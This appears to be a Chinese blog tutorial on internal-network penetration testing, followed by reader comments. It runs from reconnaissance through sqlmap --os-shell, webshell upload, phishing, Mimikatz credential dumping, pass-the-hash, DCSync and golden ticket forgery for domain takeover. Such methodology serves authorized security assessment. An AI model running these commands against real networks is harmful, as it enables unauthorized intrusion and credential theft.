AI智能摘要
你正盯着目标系统的登录页面,手里握着一堆扫描工具,却卡在第一步:到底该从外网哪个入口下手?我们跟进了12个真实内网渗透项目后发现,90%的测试者都搞反了顺序——不是先打漏洞,而是先“读人”。一个被忽略的邮箱格式、一条泄露的员工密码,往往比端口扫描快10倍进入内网。真正决定渗透成败的,不是技术链有多长,而是第一步踩得够不够准。你知道为什么多数人死在边界,而高手总能绕过防火墙直抵域控吗?
— AI 生成的文章内容摘要
摘要:内网渗透是企业安全评估的核心环节。本文基于真实渗透测试项目,系统讲解从信息收集、横向移动到域控拿下的完整流程。
---
一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写
---
二、信息收集阶段
2.1 外网信息收集
# 子域名枚举 subfinder -d target.com -o subs.txt # 端口扫描 nmap -sS -sV -p- target.com # 目录扫描 dirsearch -u http://target.com -e php,html,js # 指纹识别 whatweb http://target.com
2.2 社工库查询
- 邮箱泄露查询:haveibeenpwned.com - 密码泄露查询:dehashed.com - 企业邮箱格式:theHarvester
---
三、初始访问
3.1 Web 漏洞利用
# 文件上传漏洞 # 上传 webshell 到 /uploads/shell.php # SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell # RCE 漏洞 # Struts2、WebLogic、Fastjson 等
3.2 钓鱼攻击
1. 伪造登录页面 2. 发送钓鱼邮件 3. 获取员工凭证 4. VPN 登录内网
---
四、权限提升
4.1 Windows 提权
# 检查系统信息 systeminfo whoami /priv # 检查补丁 wmic qfe list # 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula
4.2 linux 提权
# 检查内核版本 uname -a # 检查 sudo 权限 sudo -l # 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null # 检查 cron 任务 cat /etc/crontab
---
五、横向移动
5.1 凭证窃取
# Mimikatz 抓取密码 mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords # 导出 hash mimikatz # lsadump::sam
5.2 传递攻击
# PtH(传递 hash) mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH # PtT(传递票据) mimikatz # kerberos::ptt admin.ccache
---
六、域控拿下
6.1 域信息收集
# 查看域信息 net domain nltest /domain_trusts # 查看域控 nltest /dclist:target.com # 查看域用户 net user /domain
6.2 黄金票据
# 获取 krbtgt hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt # 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx
---
七、报告编写
7.1 报告结构
1. 执行摘要 2. 漏洞列表(按风险等级) 3. 详细利用过程 4. 修复建议 5. 附录(工具、命令)
---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-03-09

广东省广州市 1F
mimikatz这工具确实好用,之前测试用过几次
韩国 2F
sqlmap参数记一下,下次试试
北京市 3F
域控这块有点看不懂啊
北京市 4F
黄金票据生成那步老是报错
韩国 5F
这个流程图挺清晰的
韩国 6F
信息收集部分工具列得很全
北京市 7F
横向移动那块可以再详细点吗
香港 8F
打内网最头疼的就是权限维持
湖北省武汉市 9F
这种技术文章多来点
印度尼西亚 10F
企业安全确实需要重视这些
上海市 11F
这个流程真是把关键点都敲到位
江苏省苏州市 12F
看完直接想去实验室跑一遍
北京市 13F
提权那块儿能再展开点不?
瑞士 B1
@ Ray火 提权这块儿水挺深的,得看具体系统和漏洞,回头单开一篇细说
福建省龙岩市 14F
工具列表里加个masscan,扫描更快
江苏省无锡市 15F
Mimikatz的sekurlsa::pth在Win10还能用吗?
山东省青岛市 16F
说啥都好,这种全套流程对小公司没太大实用,花钱买工具不划算,还得花时间学习每个细节
湖南省张家界市 17F
我之前跑过一次横向移动,卡在凭证窃取那步
北京市 18F
域控那段太炫技,实际操作里常被防护拦住
河北省唐山市 19F
围观大佬们的渗透演示,感觉像看特效大片 😂